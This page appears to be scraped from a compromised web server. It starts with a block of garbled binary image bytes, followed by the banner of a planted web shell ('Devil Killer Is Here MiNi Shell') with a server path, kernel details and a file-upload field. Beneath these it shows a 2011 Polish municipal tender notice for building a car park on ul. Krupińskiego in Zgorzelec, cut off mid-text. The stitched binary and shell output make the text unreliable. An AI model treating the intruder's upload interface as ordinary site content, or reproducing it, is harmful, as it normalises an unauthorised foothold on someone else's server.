JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110318/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110318/48110-N-2011.html

<p class="kh_header"><b>Zgorzelec: Budowa parkingu przy ul. Krupińskiego</b><br>
<b>Numer ogłoszenia: 48110 - 2011; data zamieszczenia: 18.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Zgorzelec , ul. Domańskiego 7, 59-900 Zgorzelec, woj. dolnośląskie, tel. 0-75 77 56 988, faks 075 77 56 988.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um-zgorzelec.dolnyslask.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> http://www.bip.um-zgorzelec.dolnyslask.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa parkingu przy ul. Krupińskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia  są roboty budowlane obejmujące budowę parkingu dla samochodów osobowych w liczbie 14-tu miejsc, w tym jedno miejsce należy przeznaczyć dla parkowania osób niepełnosprawnych. 

2.	Roboty związane z budową miejsc postojowych, należy wykonać przy ul. Krupińskiego w Zgorzelcu, na działce nr 21 Obr. VII AM-5. 

3.	Roboty budowlane polegać będą na budowie zjazdu na parking oraz budowie parkingu z prefabrykowanych elementów betonowych, z których wykonane są miejsca postojowe dla samochodów osobowych. 

4.	W ramach robót budowlanych należy uwzględnić również wykonanie odpowiedniej niwelety istniejącego chodnika przyulicznego w obrębie zjazdu oraz niwelety terenu w bezpośrednim sąsiedztwie projektowanego parkingu.

5.	W miejscach planowanego parkingu należy wykonać niezbędne wycięcia rosnących drzew, oraz nasadzeń nowych drzew w ilości równej liczbie wycinek, na podstawie uzyskanej decyzji z dnia 10 września 2010r.  nr II BS.6138-129/5643/10  Starosty Zgorzeleckiego. 

6.	Zamawiający wymaga by pozyskane drewno Wykonawca dostarczył nieodpłatnie, 
      do Schroniska Brata Alberta w Zgorzelcu przy ul. Henrykowskiej 4.
Przekazanie drewna nastąpi w obecności przedstawiciela Schroniska Brata Alberta
i Wykonawcy na podstawie protokołu przekazania drewna, podpisanego przez obie Strony. 

7.	Zamawiający wymaga, by w miejscu wskazanym w projekcie, Wykonawca nasadził nowe 
      drzewa w gatunkach:
1)	Jesion wyniosły Fraxinus Excelsior Nana, 
2)	Klon kulisty Acer platanoides Globusom, 
3)  Wiśnia osobliwa Umbraculifera. 

8.   Wykonawca przed przystąpieniem do realizacji robót budowlanych, przedstawi 
      Zamawiającemu wykonany i zatwierdzony projekt tymczasowej organizacji ruchu 
      na  czas trwania robót budowlanych.  

9.  Szczegółowy opis i zakres robót dla zadania objętego budową parkingu przy ul. 
     Krupińskiego został zawarty   w dokumentacji projektowej składającej się z 
Projektu Budowlanego, Specyfikacji Technicznej Wykonania i Odbioru Robót,  
      Projektu Wykonawczego,  Projektu Docelowej Organizacji Ruchu, Decyzji Nr 
      WIŚM.55484-7/10, z dnia 06.12.2010r. Burmistrza Miasta Zgorzelec w sprawie    
      urządzenia zjazdu z drogi ul. Krupińskiego dz. Nr 16 zaliczonej do kategorii dróg 
      gminnych w Zgorzelcu stanowiącej własność Gminy Miejskiej Zgorzelec, Decyzji Nr II 
      BS.6138-129/5643/10 z dnia 10. 09.2010r. Starosty Zgorzeleckiego w sprawie wycinki 
      19 drzew w związku z planowaną budową parkingu dla pojazdów osobowych w 
      Zgorzelcu,  planu zagospodarowania terenu - rysunki - załącznik nr 9 do SIWZ.  
  
10.Wykonawca jako wytwórca odpadów w rozumieniu art. 3 ust. 3 pkt 22 ustawy o 
     odpadach, ma obowiązek zagospodarowania odpadów powstałych podczas realizacji 
     zamówienia, zgodnie z ustawą o odpadach z dnia 27 kwietnia 2001r. (tekst jednolity z 
     2010r. Dz. U. Nr 185, poz. 1243 z późn. zm.)  i ustawą Prawo ochrony środowiska  z 
     dnia  27 kwietnia 2001r. (tekst jednolity z 2008r. Dz. U. Nr 25, poz.150 z późn.zm.). 
 
11. Wykonawca przedstawi Zamawiającemu potwierdzenie zagospodarowania odpadów
      zgodnie z powszechnie obowiązującymi przepisami.    

12. Zobowiązuje się Wykonawcę do wykonania docelowej organizacji ruchu  
      zawierającą wykonanie nowych oznakowań pionowych i poziomych, na podstawie 
      projektu udostępnionego przez Zamawiającego.          

13.Zobowiązuje się Wykonawcę do opracowania kompletnej dokumentacji 
     powykonawczej w 2-ch  egzemplarzach  i przekazanie jej Zamawiającemu 
     wraz ze zgłoszeniem gotowości robót  budowlanych do odbioru.  
     W skład kompletnej dokumentacji powykonawczej wchodzi:
     1) inwentaryzacja geodezyjna powykonawcza, 
     2) atesty i certyfikaty wbudowanych materiałów, prefabrykatów lub urządzeń, 
     3) aprobaty techniczne, 
     4) uzupełniony dziennik budowy, 
     5) wymagane przepisami, protokoły i zaświadczenia z przeprowadzonych przez 
         Wykonawcę badań i sprawdzeń, 
     6) oświadczenie kierownika budowy o zgodności wykonania obiektu budowlanego
          z projektem budowlanym, przepisami i obowiązującymi Polskimi Normami oraz 
          oświadczenie kierownika budowy o doprowadzeniu do należytego stanu i porządku 
          terenu budowy, a także sąsiedniej ulicy, 
     7)  w przypadku zmian nie odstępujących w sposób istotny od zatwierdzonego projektu i 
          warunków pozwolenia na budowę  oraz zgłoszenia robót niewymagających 
          pozwolenia na budowę, Wykonawca dołączy kopie rysunków wchodzących w skład 
          zatwierdzonego projektu budowlanego z naniesionymi zmianami i uzupełniającym 
          opisem, w takim przypadku oświadczenie kierownika budowy powinno być 
          zatwierdzone przez Projektanta i Inspektora Nadzoru, 
     8)  oświadczenie kierownika budowy o wbudowaniu materiałów, na które dostarczono 
          dokumenty odbiorowe, 
     9)  przed wbudowaniem materiałów budowlanych wykorzystanych w trakcie realizacji  
          robót Wykonawca ma obowiązek uzyskać ich zatwierdzenia przez Inspektora 
          Nadzoru, 
   10) oświadczenie Inspektora Nadzoru o zgodności wykonania obiektu budowlanego z 
         projektem budowlanym (wykonawczym), przepisami i obowiązującymi 
         Polskimi Normami,      
   11) pisemną gwarancję jakości na wykonany przedmiot umowy, z treści dokumentu 
         gwarancyjnego powinno wynikać, na co jest udzielona gwarancja, jak długo 
         gwarancja obejmuje,   
   12) deklarację zgodności materiałów z określeniem miejsca przeznaczenia zgodnie z 
         ustawą z dnia 16.04.2004r. o wyrobach budowlanych (Dz. U.z 2004r. Nr 92 poz. 881 z 
         późn.zm.) oraz ustawą z dnia 30.08.2002r.o systemie oceny zgodności (tekst jednolity 
         z 2010r., Dz.U. Nr 138, poz. 935). 

14. Przed przystąpieniem do w/w robót Wykonawca winien   dokonać wizji lokalnej 
      terenu, objętego robotą budowlaną, celem zapoznania się z warunkami realizacji 
      przedmiotu zamówienia.  Wizję lokalną Wykonawca dokona na koszt własny. 

15. Wykonawca zobowiązany jest  wykonać przedmiot zamówienia zgodnie z 
      dokumentacją projektową,  technologią wskazaną przez Projektanta, zgodnie z zasadami 
      wiedzy  technicznej, normami,  wskazaniami Zamawiającego, oraz obowiązującymi   
      przepisami.

16. Wykonawca wykona przedmiot zamówienia z materiałów własnych, które powinny 
      odpowiadać co do jakości wymogom wyrobów dopuszczonych do obrotu i stosowania w 
      budownictwie zgodnie z  art. 10 ustawy z dnia 7 lipca 1994r. Prawo budowlane (tekst 
      jednolity z 2006r. Dz. U. Nr 156, poz. 1118 z późn.zm.). 

17. Zamawiający wymaga 36 miesięcznego okresu gwarancji i rękojmi na wykonane roboty 
      budowlane  i zastosowane przy realizacji zamówienia materiały budowlane. 
      W dniu podpisania bezusterkowego protokołu końcowego odbioru robót, Wykonawca  
      potwierdzi  Zamawiającemu udzielenie gwarancji jakości  na wykonany  przedmiot 
      umowy  i zastosowane do realizacji zamówienia  materiały wraz z podaniem terminu 
      upływu gwarancji. 
      Jeżeli producent udzieli dłuższej gwarancji na materiały zastosowane do wykonania 
      przedmiotu zamówienia, obowiązywać będzie  gwarancja producenta.

18. W ramach udzielonej gwarancji Wykonawca zobowiązany będzie do przeprowadzania  
      w  każdym roku kalendarzowym, przeglądów  gwarancyjnych a także  przeglądu 
      pogwarancyjnego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Roboty budowlane polegające na powtórzeniu tego samego rodzaju zamówień, stanowiące nie więcej niż 50% wartości zamówienia podstawowego, zgodnie z art. 67 ust. 1 pkt. 6 ustawy Pzp.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 79.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.  Zamawiający żąda od wykonawców wniesienia wadium w wysokości 1600,00 zł. PLN 
     (słownie: jeden tysiąc sześćset zł.)
2.  Wykonawca obowiązany jest wnieść wadium przed upływem terminu składania ofert. 
     Wadium musi być na koncie Zamawiającego przed upływem terminu składania 
     ofert.  
3.  Wykonawca, który nie wniesie wadium do upływu terminu składania ofert, na 
     przedłużony okres związania ofertą lub w terminie, o którym mowa w art. 46 ust. 3 
     ustawy Pzp, albo nie zgodzi się na przedłużenie okresu związania ofertą zostanie 
     wykluczony z postępowania o udzielenie zamówienia, a oferta Wykonawcy 
     wykluczonego zostanie odrzucona zgodnie z art. 24 ust. 2 pkt. 4 ustawy Pzp.
4.  W zależności od woli wykonawcy wadium może być wnoszone w następujących  
     formach:
1)	pieniądzu,
        2)   poręczeniach bankowych lub poręczeniach spółdzielczej  kasy oszczędnościowo-
              kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
        3)   gwarancjach bankowych,
        4)   gwarancjach ubezpieczeniowych,
        5)   poręczeniach udzielonych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2
              ustawy z dnia 09.11.2000r. o utworzeniu Polskiej Agencji Rozwoju 
              Przedsiębiorczości   (Dz.U. Nr 109, poz. 1158 z póź.zm.).
UWAGA!
Wadium wniesione w formach o których mowa w art. 45 ust. 6 pkt. 2-5 ustawy Pzp musi gwarantować  Beneficjentowi zapłatę sumy gwarancyjnej jeżeli Wykonawca  w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których  mowa w art. 25 ust. 1, lub pełnomocnictw.  
5.  Zamawiający wymaga załączenia do oferty dokumentu potwierdzającego 
     wniesienie wadium do Zamawiającego.
6.  Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy
     Zamawiającego Nr 35124012971111000025654013 Bank PEKAO S.A. I
     O/Zgorzelec.
     Na przelewie należy  umieścić informację :
     Wadium na Budowa parkingu przy ul. Krupińskiego                   
7.  Zamawiający zwróci wadium wszystkim wykonawcom niezwłocznie po wyborze
     najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem wykonawcy, 
     którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt. 24.13 
     SIWZ. 
8.  Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający 
     zwróci wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego 
     oraz wniesieniu zabezpieczenia należytego wykonania umowy.  
9.  Zamawiający zwróci niezwłocznie wadium na wniosek wykonawcy, który wycofał 
     ofertę przed  upływem terminu składania ofert. 
10.Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu
     zwrócono wadium na podstawie art. 46 ust. 1 ustawy Pzp , jeżeli w wyniku 
     ostatecznego rozstrzygnięcia odwołania jego oferta została wybrana jako 
     najkorzystniejsza. Wykonawca wniesie wadium w terminie określonym przez 
      Zamawiającego. 
11. Jeżeli wadium wniesiono w pieniądzu, zamawiający zwróci je wraz z odsetkami
      wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, 
      pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej 
      za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę .
12. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego 
      oferta  została wybrana :
      a/ odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach
          określonych w ofercie, 
      b/ nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, 
      c/ zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z 
          przyczyn   leżących  po stronie wykonawcy.
13. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w 
      odpowiedzi  na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył 
      dokumentów lub oświadczeń,   o których mowa w art. 25 ust. 1 ustawy Pzp, chyba 
      że udowodni, ze wynika to z przyczyn należących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie                                     
    w oparciu o analizę przedłożonych przez Wykonawców dokumentów i oświadczeń,  
    określonych przez Zamawiającego  w pkt.11 - 12 SIWZ. 
2) Oferty Wykonawców, którzy przedłożą dokumenty i oświadczenia potwierdzające 
     spełnienie wymaganych warunków zostaną dopuszczone do badania i oceny.
3) Wykonawcy, którzy nie przedłożą dokumentów i oświadczeń potwierdzających 
     spełnienie warunków udziału w postępowaniu zostaną wykluczeni z postępowania
     z zastrzeżeniem art. 26 ust. 3 ustawy Pzp.   




4) Warunek będzie uznany za spełniony, jeżeli Wykonawca wykaże, iż wykonał: 
    1) jedną robotę budowlaną polegające na budowie, przebudowie nawierzchni z 
  kostki brukowej betonowej o wartości brutto min. 40 000,00 zł. 
    2) jedną robotę budowlaną polegającą na budowie, przebudowie nawierzchni 
  z płyt ażurowych o wartości  brutto min. 62 000,00 zł.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie                                     
     w oparciu o analizę przedłożonych przez Wykonawców dokumentów i oświadczeń,  
     określonych przez Zamawiającego  w pkt.11 - 12 SIWZ. 
2) Oferty Wykonawców, którzy przedłożą dokumenty i oświadczenia potwierdzające 
     spełnienie wymaganych warunków zostaną dopuszczone do badania i oceny.
3) Wykonawcy, którzy nie przedłożą dokumentów i oświadczeń potwierdzających 
     spełnienie warunków udziału w postępowaniu zostaną wykluczeni z postępowania
     z zastrzeżeniem art. 26 ust. 3 ustawy Pzp.   
4) Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, iż dysponuje  
     minimum 1 osobą, która będzie wykonywać zamówienie,  posiadającą           
     prawo wykonywania samodzielnych funkcji technicznych w budownictwie do 
     kierowania robotami budowlanymi  w specjalności drogowej   wraz z informacją 
     Wykonawcy o podstawie do dysponowania tą osobą.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty Wykonawca musi załączyć następujące dokumenty:   
      
1)  wypełniony i podpisany formularz ofertowy (wg. załączonego wzoru), 
2)  informacja  na temat Wykonawcy (wg zał. wzoru ) - załącznik nr 1 do SIWZ
     (w przypadku złożenia oferty wspólnej, dokument składa każdy z członków 
     konsorcjum), 
3)  oświadczenie Wykonawcy z art. 36 ust. 4 ustawy z dnia 29.01.2004r. Prawo  
     zamówień   publicznych - załącznik nr 2 do SIWZ, 
     Powyższe oświadczenie, Wykonawca składa w przypadku gdy  zamierza 
     powierzyć do wykonania  części zamówienia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewidział możliwość dokonania zmian postanowień umowy,  przy czym 
 warunki takiej zmiany Zamawiający określił  w § 12 ust. 2  projektu umowy. 
 1. Zakres przewidzianych zmian: 
     1) termin określony w pkt. 4 SIWZ i § 3 ust. 1 projektu umowy  ulegnie  przesunięciu w 
         przypadku wystąpienia opóźnień wynikających z:  
         a) opóźnień zawinionych przez Zamawiającego, mających wpływ na termin realizacji 
             przedmiotu umowy, w szczególności dot. przekazania terenu budowy, dokonania 
             odbioru końcowego robót, przekazania  dokumentacji projektowej, 
         b) opóźnień z powodu wystąpienia warunków   atmosferycznych uniemożliwiających 
             wykonanie robót budowlanych zgodnie z technologią  - a fakt wystąpienia  tych
             warunków wpisany zostanie przez Kierownika Budowy do Dziennika Budowy 
             i zostanie  potwierdzony przez Inspektora Nadzoru działającego z ramienia 
             Zamawiającego, 
        c)  z przyczyn losowych, w przypadku wystąpienia działania siły wyższej, mającej 
             bezpośredni wpływ na terminowość wykonania robót budowlanych. Pod pojęciem 
             siły wyższej strony rozumieć będą  zdarzenie zewnętrzne o charakterze: 
             niezależnym od stron, którego strony nie mogły przewidzieć przed zawarciem 
             umowy i którego nie można uniknąć ani któremu strony nie mogły zapobiec przy 
             zachowaniu należytej staranności.  
            Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności:
            powódź, pożar i inne klęski żywiołowe, zamieszki, strajki (nie dotyczą 
            pracowników Wykonawcy), ataki terrorystyczne, działania wojenne, nagłe przerwy 
            w dostawie energii elektrycznej, promieniowanie, lub skażenia, 
       d)  zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym 
            wpływ na realizację przedmiotu zamówienia,                  
       e)  wstrzymania robót budowlanych  przez uprawnione do tego organy w 
            okolicznościach, za które Wykonawca nie ponosi odpowiedzialności,         
       f)  w przypadku wystąpienia istotnych wad dokumentacji projektowej, skutkujących 
            koniecznością dokonania poprawek lub uzupełnień, jeżeli uniemożliwia to lub 
            istotnie wstrzymuje realizację określonego rodzaju robót, 
  2)  Zmiana osób wskazanych w umowie z imienia i nazwiska odpowiedzialnych za 
       realizację umowy, o których mowa w § 11 projektu umowy.    
  3)  Zmiana Podwykonawcy możliwa będzie jedynie wtedy, gdy zakres realizowanych 
       przez Podwykonawcę robót, nie ulegnie zmianie w stosunku do zakresu robót 
       wskazanych w ofercie Wykonawcy, a które zaplanował on do realizacji przez 
       Podwykonawcę. Zmiana taka możliwa będzie jedynie na uzasadniony  wniosek 
       Wykonawcy, do którego winien załączyć projekt umowy z Podwykonawcą, przy 
       czym wymagana jest w tym przypadku pisemna zgoda Zamawiającego na zawarcie 
